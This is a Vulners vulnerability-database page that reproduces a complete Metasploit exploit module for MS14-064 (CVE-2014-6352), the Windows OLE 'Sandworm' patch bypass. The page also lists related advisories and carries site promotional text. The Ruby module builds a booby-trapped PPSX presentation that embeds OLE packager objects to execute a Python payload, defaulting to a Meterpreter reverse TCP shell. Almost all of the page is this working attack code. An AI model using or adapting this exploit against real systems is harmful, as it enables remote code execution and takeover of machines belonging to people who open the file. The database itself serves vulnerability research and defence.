Vulners
Lucene search
MS14-064 Microsoft Windows OLE Package Manager Code Execution Exploit
| Reporter | Title | Published | Views | Family All 89 |
|---|---|---|---|---|
 | MS14-060 Microsoft Windows OLE Package Manager Code Execution Exploit | 18 Oct 201400:00 | – | zdt |
| Windows OLE Package Manager SandWorm Exploit | 21 Oct 201400:00 | – | zdt |
| MS Office 2007 and 2010 - OLE Arbitrary Command Execution Exploit | 12 Nov 201400:00 | – | zdt |
 | CVE-2014-4114 | 27 Jul 202100:00 | – | attackerkb |
| Microsoft Internet Explorer Use-After-Free Vulnerability | 15 Oct 201400:00 | – | attackerkb |
| CVE-2014-6352 | 22 Oct 201400:00 | – | attackerkb |
 | The vulnerability of the Windows operating system allows a malicious intruder to compromise the confidentiality, integrity, and accessibility of protected information. | 6 Jul 201600:00 | – | bdu_fstec |
| Vulnerability of Windows operating systems, related to errors in code generation, allows a hacker to execute arbitrary code. | 13 Oct 202100:00 | – | bdu_fstec |
 | CVE-2014-4114 | 14 Oct 201410:29 | – | circl |
| CVE-2014-6352 | 20 Oct 201400:00 | – | circl |
10
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability
publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista
SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.
However, based on our testing, the most reliable setup is on Windows platforms running
Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as
those using Office 2010 SP1 may be less stable, and may end up with a crash due to a
failure in the CPackage::CreateTempFileName function.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Haifei Li', # Vulnerability discovery and exploit technique
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-6352'],
['MSB', 'MS14-064'],
['BID', '70690'],
['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm']
],
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Targets' =>
[
['Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013', {}],
],
'Privileged' => false,
'DefaultOptions' =>
{
'Payload' => 'python/meterpreter/reverse_tcp'
},
'DisclosureDate' => "Nov 12 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])
], self.class)
end
def exploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
payload_packager = create_packager('tabnanny.py', payload.encoded)
trigger_packager = create_packager("#{rand_text_alpha(4)}.py", rand_text_alpha(4 + rand(10)))
zip = zip_ppsx(payload_packager, trigger_packager)
file_create(zip)
end
def zip_ppsx(ole_payload, ole_trigger)
zip_data = {}
data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')
Dir["#{data_dir}/**/**"].each do |file|
unless File.directory?(file)
zip_data[file.sub(data_dir,'')] = File.read(file)
end
end
# add the otherwise skipped "hidden" file
file = "#{data_dir}/_rels/.rels"
zip_data[file.sub(data_dir,'')] = File.read(file)
# put our own OLE streams
zip_data['/ppt/embeddings/oleObject1.bin'] = ole_payload
zip_data['/ppt/embeddings/oleObject2.bin'] = ole_trigger
# create the ppsx
ppsx = Rex::Zip::Archive.new
zip_data.each_pair do |k,v|
ppsx.add_file(k,v)
end
ppsx.pack
end
def create_packager(file_name, contents)
file_info = [2].pack('v')
file_info << "#{file_name}\x00"
file_info << "#{file_name}\x00"
file_info << "\x00\x00"
extract_info = [3].pack('v')
extract_info << [file_name.length + 1].pack('V')
extract_info << "#{file_name}\x00"
file = [contents.length].pack('V')
file << contents
append_info = [file_name.length].pack('V')
append_info << Rex::Text.to_unicode(file_name)
append_info << [file_name.length].pack('V')
append_info << Rex::Text.to_unicode(file_name)
append_info << [file_name.length].pack('V')
append_info << Rex::Text.to_unicode(file_name)
ole_data = file_info + extract_info + file + append_info
ole_contents = [ole_data.length].pack('V') + ole_data
ole = create_ole("\x01OLE10Native", ole_contents)
ole
end
def create_ole(stream_name, data)
ole_tmp = Rex::Quickfile.new('ole')
stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
stm = stg.create_stream(stream_name)
stm << data
stm.close
directory = stg.instance_variable_get(:@directory)
directory.each_entry do |entry|
if entry.instance_variable_get(:@_ab) == 'Root Entry'
# 0003000C-0000-0000-c000-000000000046 # Packager
clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
entry.instance_variable_set(:@_clsId, clsid)
end
end
# write to disk
stg.close
ole_contents = File.read(ole_tmp.path)
ole_tmp.close
ole_tmp.unlink
ole_contents
end
end
# 0day.today [2018-02-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Nov 2014 00:00Current
8High risk
Vulners AI Score8
EPSS0.92318